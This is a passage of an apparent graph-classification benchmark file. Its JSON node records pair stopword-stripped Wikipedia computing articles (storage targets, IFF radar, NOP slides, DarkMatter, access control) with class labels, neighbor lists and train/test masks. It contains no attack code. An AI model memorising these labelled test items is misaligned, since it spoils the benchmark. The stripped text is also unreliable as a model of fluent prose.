1990s macintosh computers supported firewire target disk mode since 1999 firewire sbp-2 fabric module released linux 3.5 july 21 2012 internet small computer system interface iscsi fabric module allows transport scsi traffic across standard ip networks carrying scsi sessions across ip networks iscsi used facilitate data transfers intranets manage storage long distances iscsi used transmit data local area networks lans wide area networks wans internet enable location-independent location-transparent data storage retrieval lio iscsi fabric module also implements number advanced iscsi features increase performance resiliency multiple connections per session mc/s error recovery levels 0-2 erl=0,1,2 lio supports standard ethernet nics iscsi fabric module released linux 3.1 october 24 2011 networks supporting remote direct memory access rdma use iscsi extensions rdma iser fabric module transport iscsi traffic iser permits data transferred directly remote scsi computer memory buffers without intermediate data copies direct data placement ddp using rdma rdma supported infiniband networks ethernet data center bridging dcb networks via rdma converged ethernet roce standard ethernet networks iwarp enhanced tcp offload engine controllers iser fabric module developed together datera mellanox technologies first released linux 3.10 june 30 2013 scsi rdma protocol srp fabric module allows transport scsi traffic across rdma see networks 2013 srp widely used iser although limited scsi peer-to-peer protocol whereas iscsi fully routable srp fabric module supports following mellanox host channel adapters hcas srp fabric module released linux 3.3 march 18 2012 2012 c't magazine measured almost 5000 mb/s throughput lio srp target one mellanox connectx-3 port 56 gbit/s fdr mode sandy bridge pci express 3.0 system four fusion-io iodrive pci express flash memory cards usb gadget fabric module enables linux export local storage devices via universal serial bus usb systems mount ordinary storage device usb designed mid-1990s standardize connection computer peripherals also become common data storage devices usb gadget fabric module released linux 3.5 july 21 2012 targetcli user space single-node management command line interface cli lio supports fabric modules based modular extensible architecture plug-in modules additional fabric modules functionality targetcli provides cli uses underlying generic target library well-defined api thus cli easily replaced complemented ui metaphors gui targetcli implemented python consists three main modules detailed instructions set lio targets found lio wiki targetcli lio included linux distributions per default overview popular ones together initial inclusion dates",
    "neighbors": [
      4616,
      6153,
      3082,
      5139,
      10780,
      10785,
      9762,
      6180,
      6187,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      10853,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      8364,
      10933,
      5815,
      7863,
      5822,
      5824,
      710,
      1736,
      2762,
      8909,
      6352,
      8410,
      5339,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      3820,
      7920,
      10482,
      2294,
      8439,
      5368,
      2809,
      4360,
      1801,
      2314,
      1291,
      4367,
      792,
      799,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      8520,
      6988,
      10063,
      5975,
      11095,
      8554,
      10091,
      11627,
      7540,
      3445,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      6037,
      9621,
      1431,
      408,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      8625,
      8115,
      1972,
      9667,
      457,
      9686,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 2724,
    "label": 2,
    "text": "Peter_T._Brown:peter t. brown peter t. brown executive director free software foundation fsf 2005 early 2011 come business management finance background began working organization 2001 comptroller promoted executive director 2005 departure bradley kuhn replaced john sullivan since joined software freedom conservancy director treasurer oxford england worked past bbc new internationalist became american citizen august 2017",
    "neighbors": [
      10464,
      1394
    ],
    "mask": "Train"
  },
  {
    "node_id": 2725,
    "label": 4,
    "text": "Enterprise_Privacy_Authorization_Language:enterprise privacy authorization language enterprise privacy authorization language epal formal language writing enterprise privacy policies govern data handling practices systems according fine-grained positive negative authorization rights submitted ibm world wide web consortium w3c 2003 considered recommendation 2004 lawsuit filed zero-knowledge systems claiming ibm breached copyright agreement worked together 2001 2002 create privacy rights markup language prml epal based prml means zero-knowledge argued co-owner standard",
    "neighbors": [
      2818,
      8262,
      1368,
      3323,
      124,
      2013
    ],
    "mask": "Test"
  },
  {
    "node_id": 2726,
    "label": 6,
    "text": ".wps:.wps .wps file extension used",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2727,
    "label": 1,
    "text": "MSQL:msql msql mini sql lightweight database management system hughes technologies 1993–94 david hughes developed network monitoring management system called minerva design system required database management system store configuration working data enable future portability hughes elected use structured query language interface application database management system despite fact time free inexpensive sql database management implementation available hughes therefore developed translation program provided interface free postgres dbms use sql product named minisql msql time became clear postgres perform adequately low-specification systems used run minerva msql developed lightweight database management system right implementing limited subset sql standard performing well minimally specified hardware msql first low-cost sql-based database management system combined free linux operating system availability relatively powerful low-cost pc hardware development world wide web standards technologies msql important factor early development interactive dynamic web applications particularly period 1994–97 increasingly supplanted highly featured mysql msql large widespread install base late 1990s despite offered source code form strongly associated open source software msql never offered open source license msql provided free non-commercial use typical license commercial use 1997 would cost 170 compared five-digit purchase price full-featured competitors 1996 development msql began stagnate mysql arose fill void 1999 mysql surpassed msql popularity today msql less visibility time database system often licensed companies use products used end-users directly msql actively maintained developed primarily support licensees internal use within hughes technologies products projects still provided license allows use free charge non-commercial educational charitable activities msql 4.2 released april 2019. msql originally supported several host languages",
    "neighbors": [
      2372,
      8644,
      8582,
      5612,
      5677,
      7022,
      7983,
      10286,
      10413,
      692,
      119,
      10389,
      823,
      11030,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2728,
    "label": 4,
    "text": "Identification_friend_or_foe:identification friend foe identification friend foe iff radar-based identification system designed command control uses transponder listens interrogation signal sends response consisting unique signal identifies broadcaster enables military civilian air traffic control interrogation systems identify aircraft vehicles forces friendly determine bearing range interrogator iff may used military civilian aircraft iff first developed second world war arrival radar several infamous friendly fire incidents despite name iff positively identify friendly targets hostile ones iff interrogation receives reply invalid reply object identified friendly positively identified foe may instance friendly aircraft inoperative malfunctioning transponder addition many reasons friendly aircraft may properly reply iff iff tool within broader military action combat identification cid process attaining accurate characterization detected objects operational environment sufficient support engagement decision broadest characterization friend enemy neutral unknown cid reduce friendly fire incidents also contributes overall tactical decision-making successful deployment radar systems air defence world war ii combatants immediately confronted difficulty distinguishing friendly aircraft hostile ones time aircraft flown high speed altitude making visual identification impossible targets showed featureless blips radar screen led incidents battle barking creek britain air attack fortress koepenick germany already deployment chain home radar system ch raf considered problem iff robert watson-watt filed patents systems 1935 1936 1938 researchers bawdsey manor began experiments reflectors consisting dipole antennas tuned resonate primary frequency ch radars pulse ch transmitter hit aircraft antennas would resonate short time increasing amount energy returned ch receiver antenna connected motorized switch periodically shorted preventing producing signal caused return ch set periodically lengthen shorten antenna turned practice system found unreliable use return highly dependent direction aircraft moving relative ch station often returned little additional signal suspected system would little use practice turned case raf turned entirely different system also planned consisted set tracking stations using hf/df radio direction finders aircraft radios modified send 1 khz tone 14 seconds every minute allowing stations ample time measure aircraft bearing several stations assigned sector air defence system sent measurements plotting station sector headquarters used triangulation determine aircraft location known pip-squeak system worked labour-intensive display information directly radar operators system worked directly radar clearly desirable first active iff transponder transmitter/responder iff mark used experimentally 1939 used regenerative receiver fed small amount amplified output back input strongly amplifying even small signals long single frequency like morse code unlike voice transmissions tuned signal ch radar 20–30 mhz amplifying strongly broadcast back aircraft antenna since signal received time original reflection ch signal result lengthened blip ch display easily identifiable testing found unit would often overpower radar produce little signal seen time new radars introduced using new frequencies instead putting mark production new iff mark ii introduced early 1940 mark ii series separate tuners inside tuned different radar bands stepped using motorized switch automatic gain control solved problem sending much signal mark ii technically complete war began lack sets meant available quantity small number raf aircraft carried time battle britain pip-squeak kept operation period battle ended iff mark ii quickly put full operation pip-squeak still used areas land ch cover well emergency guidance system even 1940 complex system mark ii reaching limits new radars constantly introduced 1941 number sub-models introduced covered different combinations radars common naval ones instance used raf introduction radars based microwave-frequency cavity magnetron rendered obsolete simply way make responder operating band using contemporary electronics 1940 english engineer freddie williams suggested using single separate frequency iff signals time seemed pressing need change existing system introduction magnetron work concept began telecommunications research establishment iff mark iii become standard western allies war mark iii transponders designed respond specific 'interrogators rather replying directly received radar signals interrogators worked limited selection frequencies matter radar paired system also allowed limited communication made including ability transmit coded 'mayday response iff sets designed built ferranti manchester williams specifications equivalent sets manufactured us initially copies british sets allied aircraft would identified upon interrogation radar iff sets obviously highly classified thus many wired explosives event aircrew bailed crash landed jerry proc reports alongside switch turn unit iff destruct switch prevent capture enemy many pilot chose wrong switch blew iff unit thud contained explosion acrid smell burning insulation cockpit deter many pilots destroying iff units time time eventually self destruct switch secured thin wire prevent accidental use fug 25a erstling english firstborn debut developed germany 1940 two bands tuned low-vhf band 125 mhz used freya radar low-uhf-banded 550–580 mhz used würzburg flight transceiver set selected day code ten bits dialled unit start identification procedure ground operator switched pulse frequency radar 3,750 hz 5,000 hz airborne receiver decoded started transmit day code radar operator would see blip lengthen shorten given code ensuring spoofed iff transmitter worked 168 mhz power 400 watts pep system included way ground controllers determine whether aircraft right code include way transponder reject signals sources british military scientists found way exploiting building iff transmitter called perfectos designed trigger response fug 25a system vicinity fug 25a responded 168 mhz frequency signal received antenna system ai mk iv radar originally operated 212 mhz comparing strength signal different antennas direction target could determined mounted mosquitos perfectos severely limited german use fug 25a united states naval research laboratory working iff system since war used single interrogation frequency like mark iii separate responder frequency responding different frequency several practical advantages notably response one iff trigger another requires complete transmitter responder side circuitry contrast greatly simplified system used british designs technique known cross-band transponder mark ii revealed 1941 tizard mission decided use take time improve experimental system result became mark iv main difference earlier models worked higher frequencies around 600 mhz allowed much smaller antennas unfortunately also turned close frequencies used german würzburg radar concerns would triggered radar transponder responses would picked radar display thereby give away operational frequencies led us–british effort make improved model mark v also known united nations beacon unb moved still higher frequencies around 1 ghz operational testing complete war ended time testing finished 1948 much improved mark x beginning testing mark v abandoned mark x started purely experimental device operating frequencies 1 ghz development continued decided introduce encoding system known selective identification feature sif sif allowed return signal contain 12 pulses representing four octal digits 3 bits depending timing interrogation signal sif would respond several ways mode 1 indicated type aircraft mission cargo instance mode 2 returned tail code mark x began introduced early 1950s period great expansion civilian air transport system decided use slightly modified mark x sets aircraft well sets included new mode 3 paired civilian mode operated similar original mode 2 returned four-digit identifier mode 3 identical normally referred mode 3/a addition mode c returned altitude encoded single 12-bit number gillham code represented altitude number x 100 feet 1200 mode b specified never used current iff system mark xii works frequencies mark x supports military civilian modes main reason creation mark xii addition military mode 4 mark xii transponders would respond properly formed interrogation signal broadcasting reply could picked receiver using triangulation enemy could determine location transponder british already used technique germans wwii used usaf vpaf aircraft vietnam war mode 4 started interrogation similar mode 3 followed encoded pulse chain similar one used mode 3/a receiver side transponder checks code known day code responds two match pulses reply delayed based received code largely eliminates ability enemy trigger transponder 1980s new civilian mode mode added allowed greatly increased amounts data encoded returned signal used encode location aircraft navigation system basic part traffic collision avoidance system tcas system allows commercial aircraft know location aircraft area avoid without need ground operators basic concepts mode militarized mode 5 simply cryptographically encoded version mode data iff world war ii soviet military systems 1946 1991 used coded radar signals called cross-band interrogation cbi automatically trigger aircraft transponder aircraft illuminated radar radar-based aircraft identification also called secondary radar military civil usage primary radar bouncing rf pulse aircraft determine position george charrier working rca filed patent iff device 1941 required operator perform several adjustments radar receiver suppress image natural echo radar receiver visual examination iff signal would possible 1943 donald barchok filed patent radar system using acronym iff text parenthetic explanation indicating acronym become accepted term 1945 emile labin edwin turner filed patents radar iff systems outgoing radar signal transponder reply signal could independently programmed binary codes setting arrays toggle switches allowed iff code varied day day even hour hour united states nato countries started using system called mark xii late twentieth century britain implemented iff system compatible standard developed program compatible system known successor iff siff modes 4 5 designated use nato forces",
    "neighbors": [
      11404
    ],
    "mask": "None"
  },
  {
    "node_id": 2729,
    "label": 2,
    "text": "Zero_page_(CP/M):zero page cp/m zero page base page data structure used cp/m systems programs communicate operating system 8-bit cp/m versions located first 256 bytes memory hence name equivalent structure dos program segment prefix psp 8-bit cp/m following structure cp/m-86 structure",
    "neighbors": [
      10113,
      6921,
      3216,
      2840,
      2201,
      7323,
      7849,
      11562,
      178,
      4409,
      7999,
      4548,
      5457,
      8529,
      10067,
      10083,
      5220,
      1515,
      2672,
      3056,
      4337,
      9329,
      4727,
      11513,
      6778
    ],
    "mask": "None"
  },
  {
    "node_id": 2730,
    "label": 2,
    "text": "DirectFB:directfb directfb direct frame buffer software library small memory footprint provides graphics acceleration input device handling abstraction layer integrated windowing system support translucent windows multiple display layers top linux framebuffer without requiring kernel modifications directfb free open-source software subject terms gnu lesser general public license lgpl library allows developers alternative full x window system x11 server used unix-like operating systems directfb allows applications talk directly video hardware direct api speeding simplifying graphic operations often used games embedded systems developers circumvent overhead full x window system server implementation 2006 version directfb included software stack ce linux forum audio/video graphics specification v2 directfb host xdirectfb rootless x server implementation uses directfb windows x11 top-level windows xdirectfb interface mimics x11 interface directfb api simplify running applications written x11 directfb directfbgl opengl extension directfb/xdirectfb uses direct rendering infrastructure dri mesa 3d library support opengl hardware acceleration among products use directfb linuxtv ben nanonote unreleased palm foleo mobile companion webos operating system panasonic viera connect tvs philips tvs based jointspace",
    "neighbors": [
      6403,
      4902,
      11431,
      7983,
      10480,
      2804,
      5397,
      11221,
      823,
      2045,
      9054
    ],
    "mask": "Test"
  },
  {
    "node_id": 2731,
    "label": 3,
    "text": "SPARC_T3:sparc t3 sparc t3 microprocessor previously known ultrasparc t3 codenamed rainbow falls also known ultrasparc kt niagara-3 development multithreading multi-core cpu produced oracle corporation previously sun microsystems officially launched 20 september 2010 member sparc family successor ultrasparc t2 overall single socket multi-socket throughput increased t3 processor systems providing superior throughput half cpu socket requirements predecessor throughput spec cint2006 rate increased single socket t3-1 platform comparison predecessor t2+ processor dual-socket t5240 platform simulated web serving workloads dual-socket based sparc t3 systems benchmarked better performance quad-socket previous generation ultrasparc t2+ systems well competing dual quad socket contemporary systems online publication register incorrectly reported june 2008 microprocessor would 16 cores 16 threads september 2009 published roadmap instead showed 8 threads per core hot chips 21 conference sun revealed chip total 16 cores 128 threads according isscc 2010 presentation 16-core sparc soc processor enables 512 threads 4-way glueless system maximize throughput 6mb l2 cache 461gb/s 308-pin serdes i/o 2.4tb/s support required bandwidth six clock four voltage domains well power management circuit techniques optimize performance power variability yield trade-offs across 377mm die support ultrasparc t3 confirmed july 16 2010 arcbot twitter noted unpublished psarc/2010/274 revealed new -xtarget value ultrasparc t3 included opensolaris oracle openworld san francisco september 20 2010 processor officially launched sparc t3 dropping ultra prefix name accompanied new systems new reported benchmarks claiming world-record performance varied real-world application benchmarks released full system disclosures internationally recognized spec benchmarks also released full system disclosures oracle disclosed sparc t3 built 40 nm process sparc t3 features include release sparc t3 chip new brand oracle sparc t-series servers introduced market effectively replacing cmt ultrasparc t2/t2 plus machines previous sparc enterprise product line fewer physical products former server line refreshed t3 chip reducing total number servers respectively four like prior t1 t2 t2+ processors t3 supports hyper-privileged execution mode t3 supports 128 oracle vm server sparc domains feature formerly known logical domains sparc t3 processor effectively two t2+ processors single die t3",
    "neighbors": [
      5378,
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      1818,
      8863,
      1707,
      10926,
      3247,
      6322,
      10675,
      4664,
      4285,
      6464,
      7104,
      9665,
      9541,
      2895,
      3919,
      597,
      6107,
      2269,
      11487,
      9955,
      11363,
      7270,
      11626,
      10734,
      1776,
      11636,
      630,
      1399,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 2732,
    "label": 4,
    "text": "NOP_slide:nop slide computer security nop slide nop sled nop ramp sequence nop no-operation instructions meant slide cpu instruction execution flow final desired destination whenever program branches memory address anywhere slide technique sees common usage software exploits used direct program execution branch instruction target known precisely notable applications include defensive programming strategies emc-aware programming nop slide function consists list canonical nop instructions presence code suspicious easy automatically detect reason practical nop slides often composed non-canonical nop instructions moving register adding zero instructions affect program state inconsequentially makes much difficult identify entropy nop slide dependent upon constraints placed determined certain registers use say set known value next use instructions manipulate arbitrarily may used nop slide additionally alignment nop slide instruction pointer deterministic multi-byte instructions used nop slide without regard results unaligned execution input providing attack vector nop slide payload introduced filtered accepting printable characters field possible instructions inclusion limited instructions part architecture extension sse may frequently irrelevant program state used nop slide targeting computer extension supported many techniques exist detect presence nop slides memory example 2005 greek researchers found easily detected checking whether memory image contains lengthy sequence bytes starting offset within sequence valid leads execution place",
    "neighbors": [
      1474,
      10786,
      5358,
      3473,
      9393,
      11537,
      8126,
      5176,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2733,
    "label": 4,
    "text": "Digital_Guardian:digital guardian digital guardian american data loss prevention software company provides software end-user level corporate networks servers databases cloud digital guardian designed see stop malicious actions users malware endpoints puts data events context applies granular set rules protect threats company holds 20 patents technology customers include 300 global 2000 companies well seven 10 largest brands world considered leader global data loss prevention market company founded 2003 name verdasys start flagship product digital guardian data-centric security platform monitoring encrypting proprietary sensitive information passing desktop laptop enterprise server 2008 verdasys launched sitetrust encryption software service banks brokerages big companies served customers internet legally liable losses online fraud client-side software package turned whenever user visited website protected sitetrust service spawned new instance user web browser shutting malware creating secure space around communications protected site agreement verdasys fidelis security systems fidelis cybersecurity 2010 enabled customers acquire implement integrated solution consisting fidelis xps network appliances digital guardian enterprise information protection single offering verdasys early 2012 verdasys expanded data leak prevention portfolio cloud help enterprises protect data stored networks reduce costs one customers large insurance company requested verdasys take job monitoring protecting data verdasys introduced two new offerings managed service information protection msip information protection service ipaas offering data protection managed service digital guardian platform completed eal2+ evaluation communications security establishment common criteria evaluation certification scheme december 2012 verdasys introduced data connector 2013 contained malware threats detected fireeye platform verdasys connector malware handled manually december gartner magic quadrant placed digital guardian among five leaders global data loss prevention market ken levine previously mcafee executive joined company ceo 2014 focused simplifying product march verdasys raised 12 million venture funding bringing company total raised capital 69 million funding round led existing investors ge pension trust fairhaven capital new individual investment brookline venture partners 2014 also year several major partnerships acquisitions march identity finder llc partnered verdasys bringing sensitive data manager capable automatically finding classifying securing sensitive information august verdasys changed name digital guardian increased staff 150 time security software installed two million servers laptops devices october company acquired armor5 provider cloud control solutions focusing specifically preventing employees bring mobile device work copying removing company files data may 2015 company acquired savant protection enabling organizations deploy unique agent whitelisting applications used particular endpoint blue coat systems launched alliance ecosystem endpoint detection response july 2015 digital guardian among alliance-founding members ecosystem allows sharing actionable intelligence gathered endpoint security solutions also july consulting firm atos digital guardian partnered deliver atos ’ cloud-based data loss prevention service october company bought code green networks based silicon valley contributed true dlp gear acquisition code green networks provided digital guardian network discovery cloud data loss prevention company added 100 customers 2015 bringing total count nearly 500 including general electric dupont end year digital guardian announced 66 million new funding firm largest round since founded returning investors round ge pension trust advised ge asset management fairhaven capital partners loring wolcott coolidge special situation funds brookline venture partners new investors llr partners mass mutual ventures corporate venture capital arm massachusetts mutual life insurance company venture unit siemens financial services company raised 135 million since founding january 2016 gartner magic quadrant enterprise data loss prevention placed digital guardian among four leaders global data loss prevention market fourth consecutive time bostinno included digital guardian among 16 boston tech firms watch 2016 company placed 148th list top 500 cybersecurity firms world released cybersecurity ventures 2015 data loss prevention software platform digital guardian integrates content context location awareness along encryption data level controls reduce risk information loss misuse purposeful data theft host-based security technology empowers organizations monitor control audit prevent data wrongful disclosure malicious theft automatically enforcing data security policies procedures scalable platform provides multiple independent layers protection enable secure data sharing across physical virtual mobile cloud environments architecture platform three parts digital guardian allows businesses host manage premise choose managed security programs deployed managed service digital guardian collect actual data rather aggregates metadata files documents watches patterns activity metadata encrypted hashed digitally signed transferred digital guardian hosting facilities via fips 140-2 certified messaging protocol digital guardian provides updated analytics alerts reports administrators continuously monitor data application system access usage whether end users online offline virtual environments organizations apply specific risk-based policy controls adhere data governance compliance rules example health service organization cigna uses digital guardian software monitor ports encrypt data transfers employees try transfer files usb flash drive prompted type reasons transfer data actually transferred compared reasons digital guardian also provides support sharefile file sharing storage systems extending data loss prevention capabilities organizations support virtual desktops",
    "neighbors": [
      2818,
      10245,
      4107,
      11429,
      3880,
      11432,
      3629,
      5563,
      3262,
      704,
      3520,
      2901,
      1239,
      7515,
      11611,
      4194,
      612,
      2158,
      5363,
      7802,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2734,
    "label": 4,
    "text": "DarkMatter_(Emirati_company):darkmatter emirati company darkmatter founded united arab emirates uae 2014 2015 cybersecurity company company describes purely defensive company several whistleblowers alleged involved offensive cybersecurity cracking colloquially hacking including behalf emirati government darkmatter founded either 2014 2015 faisal al-bannai founder mobile phone vendor axiom telecom son major general dubai police force around 2014 zeline 1 wholly owned subsidiary darkmatter became active finland darkmatter public launch came 2015 2nd annual arab future cities summit time company advertised capabilities including network security bug sweeping promised create new secure mobile phone handset promoted digital defense intelligence service uae 2016 darkmatter replaced cyberpoint contractor project raven also 2016 darkmatter sought smartphone development expertise oulu finland darkmatter recruited several finnish engineers early 2018 darkmatter turnover hundreds millions us dollars eighty per cent work uae government related organisations including nesa developed smartphone model called katim arabic silence addition recruiting via conventional routes personal referrals stalls trade shows e.g black hat darkmatter headhunts staff u.s. national security agency poached competitors staff contracted uae government happened cyberpoint employees project raven confidential initiative help uae surveil governments militants human rights activists team included former u.s. intelligence agents applied training hack phones computers belonging project raven victims operation based converted mansion abu dhabi nicknamed villa around 2014 2016 cyberpoint supplied u.s.-trained contractors project raven 2016 news reports emerged cyberpoint contracted italian spyware company hacking team damaged cyberpoint reputation defensive cybersecurity firm reportedly dissatisfied relying upon u.s.-based contractor uae replaced cyberpoint darkmatter contractor darkmatter induced several cyberpoint staff move darkmatter project raven reportedly expanded surveillance include targeting americans potentially implicating american staff unlawful behaviour 2016 project raven bought tool called karma karma able remotely exploit apple iphones anywhere world without requiring interaction part iphone owner apparently achieved exploiting zero-day vulnerability device imessage app project raven operatives able view passwords emails text messages photos location data compromised iphones people whose mobile phones deliberately compromised using karma reportedly include 2017 apple patched security vulnerabilities exploited karma reducing tool effectiveness 2016 two darkmatter whistleblowers multiple security researchers expressed concerns darkmatter intended become certificate authority ca would give technical capability create fraudulent certificates would allow fraudulent websites software updates convincingly masquerade legitimate ones capabilities misused would allow darkmatter easily deploy rootkits targets devices decrypt https communications firefox users via man-in-the-middle attacks 28 december 2017 darkmatter requested mozilla include trusted ca firefox web browser year mozilla reviewers addressed concerns darkmatter technical practices eventually questioning basis whether darkmatter met baseline requirements inclusion 30 january 2019 reuters published investigations describing darkmatter project raven mozilla reviewers noted investigation findings subsequently electronic frontier foundation eff others asked mozilla deny darkmatter request basis investigation showed darkmatter untrustworthy therefore liable misuse capabilities mozilla public consultation deliberations ongoing july 2019 mozilla prohibited government united arab emirates operating one internet security gatekeepers following reports cyber espionage program run abu dhabi-based darkmatter staff leading clandestine hacking operation august 2019 google blocked websites approved darkmatter reuters reported firm ’ involvement hacking operation led united arab emirates google previously said websites certified darkmatter would marked unsafe chrome android browsers",
    "neighbors": [
      5024,
      2275,
      517,
      3944,
      8264,
      939,
      8172,
      9791,
      2542,
      7887,
      5078,
      10392,
      4318,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2735,
    "label": 2,
    "text": "IPod_Touch_(7th_generation):ipod touch 7th generation seventh-generation ipod touch stylized marketed ipod touch colloquially known ipod touch 7g ipod touch 7 ipod touch 2019 multipurpose handheld device designed marketed apple inc. touchscreen-based user interface successor ipod touch 6th generation becoming first major update ipod touch since 2015 released online apple store may 28 2019 seventh-generation ipod touch features ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interface control elements consist sliders switches buttons interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating vertically one common result switching portrait landscape mode seventh-generation ipod touch introduced may 28 2019 running latest ios version 12.3.1 play music movies television shows audiobooks podcasts sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks however earpods come seventh-generation ipod touch include remote microphone voice control feature also used identify track play songs playlist specific artist create genius playlist apple a10 system-on-chip seventh-generation ipod touch enables advanced features predecessors includes arkit applications group facetime functionality seventh-generation ipod touch features apple a10 processor m10 motion coprocessor processor used apple iphone 7 apple ipad 2018 however underclocked 1.64 ghz 2.34 ghz uses two four cores making ipod touch weaker devices chip seventh-generation ipod touch features front rear camera systems sixth-generation device includes 8mp rear facing camera capable recording video 1080p resolution 30fps slow-motion video 720p 120fps camera also supports different photo features burst photos hdr photos panoramic photos front facing camera facetime hd camera capable taking photos 1.2mp recording video 720p 30fps camera also features auto hdr video recordings burst photo capabilities device first ipod touch come 256 gb storage option— highest capacity ever offered ipod surpassing 160gb capacity sixth-generation ipod classic discontinued 2014 seventh-generation ipod touch ships apple earpods apple lightning usb charging cable device also supports apple airpods earpods lightning connector",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      3248,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 2736,
    "label": 5,
    "text": "PKI_Resource_Query_Protocol:pki resource query protocol pki resource query protocol prqp internet protocol used obtaining information services associated x.509 certification authority described draft document pkix working group released 2013-oct-23 proposed standard rfc7030 created massimiliano pala solve interoperability usabilities issues among pkis specifically addressing certain problems associated finding services data repositories associated ca messages communicated via prqp encoded asn.1 usually communicated http present ever services protocols defined address different needs users administrators pkis deployment new applications services need access pki resources provided different organizations critical application needs told find services new certificate encounters therefore application needs properly configured filling complex configuration options whose meaning mostly unknown average user likely administrator well prqp protocol addresses interoperability trust building issues among separate pki islands fact provides dynamic method capable provide timely information provided services available pki resources also used help painless rollover services e.g switching crls ocsp certificate validation moreover prqp allows pki management dynamically choose services provided based faced challenges infrastructure deployment words prqp thought similar concept dns pki resources pkis three primary methods clients obtain pointers pki data adopting specific certificate extensions looking easily accessible repositories e.g dns local database etc adapting existing protocols e.g web services provide pointers published data ca could use authority information access aia subject information access sia extensions detailed rfc-3280 former provide information issuer certificate latter carries information inside ca certificates offered services subject information access extension carry uri point certificate repositories timestamping services hence extension allows access services several different protocols e.g http ftp ldap smtp although encouraged usage aia sia extension still widely deployed two main reasons first lack support extensions available clients second reason extensions static i.e modifiable indeed modify add new extensions order users applications aware new services dismissal certificate must re-issued would feasible end entities ee certificates except periodic reissuing would feasible ca certificate ca could retain public key name add new values aia extension new certificate users fetch ca cert regularly rather caching would enable become aware new services although possible almost every available clients look cas certificates already stored clients local database case since urls tend change quite often certificates persist longer time frames experience suggests extensions invariably point urls longer exist moreover considering fact entity issues certificates one runs services may infeasible issuing ca reissue certificate case server url changes therefore wise depend usage aia sia extensions available services repositories lookup srv record dns service record technique thought provide pointers servers directly dns rfc 1035 defined rfc 2782 introduction type record allows administrators perform operations rather similar ones needed solve problem prqp addresses i.e easily configurable pki discovery service basic idea client query dns specific srv record example srv-aware ldap client wants discover ldap server certain domain performs dns lookup _ldap._tcp.example.com _tcp means client requesting tcp enabled ldap server returned record contains information priority weight port target service domain problem adoption mechanism pkis unlike dns usually fixed requirement name space used time correspondence dns structure data contained certificates exception domain component dc attributes used certificate subject dc attributes used specify domain components dns name example domain name example.com could represented using dc=com dc=example format ca subject field would make use format issuer field would allow client applications perform dns lookups provided domain information repositories services could stored however currently practice different fact extremely difficult client map digital certificates dns records dc format widely adopted existing cas example one certificate ie7/outlook certificates store uses domain components provide mapping certificate internet domain",
    "neighbors": [
      513,
      7364,
      10020,
      2887,
      10924,
      9909
    ],
    "mask": "None"
  },
  {
    "node_id": 2737,
    "label": 4,
    "text": "Access_control:access control fields physical security information security access control ac selective restriction access place resource act accessing may mean consuming entering using permission access resource called authorization locks login credentials two analogous mechanisms access control geographical access control may enforced personnel e.g. border guard bouncer ticket checker device turnstile may fences avoid circumventing access control alternative access control strict sense physically controlling access system checking authorized presence see e.g ticket controller transportation variant exit control e.g shop checkout country term access control refers practice restricting entrance property building room authorized persons physical access control achieved human guard bouncer receptionist mechanical means locks keys technological means access control systems like mantrap within environments physical key management may also employed means managing monitoring access mechanically keyed areas access certain small assets physical access control matter access control system determines allowed enter exit allowed exit enter allowed enter exit historically partially accomplished keys locks door locked someone key enter door depending lock configured mechanical locks keys allow restriction key holder specific times dates mechanical locks keys provide records key used specific door keys easily copied transferred unauthorized person mechanical key lost key holder longer authorized use protected area locks must re-keyed electronic access control uses computers solve limitations mechanical locks keys wide range credentials used replace mechanical keys electronic access control system grants access based credential presented access granted door unlocked predetermined time transaction recorded access refused door remains locked attempted access recorded system also monitor door alarm door forced open held open long unlocked credential presented reader reader sends credential information usually number control panel highly reliable processor control panel compares credential number access control list grants denies presented request sends transaction log database access denied based access control list door remains locked match credential access control list control panel operates relay turn unlocks door control panel also ignores door open signal prevent alarm often reader provides feedback flashing red led access denied flashing green led access granted description illustrates single factor transaction credentials passed around thus subverting access control list example alice access rights server room bob alice either gives bob credential bob takes access server room prevent two-factor authentication used two factor transaction presented credential second factor needed access granted another factor pin second credential operator intervention biometric input three types factors authenticating information 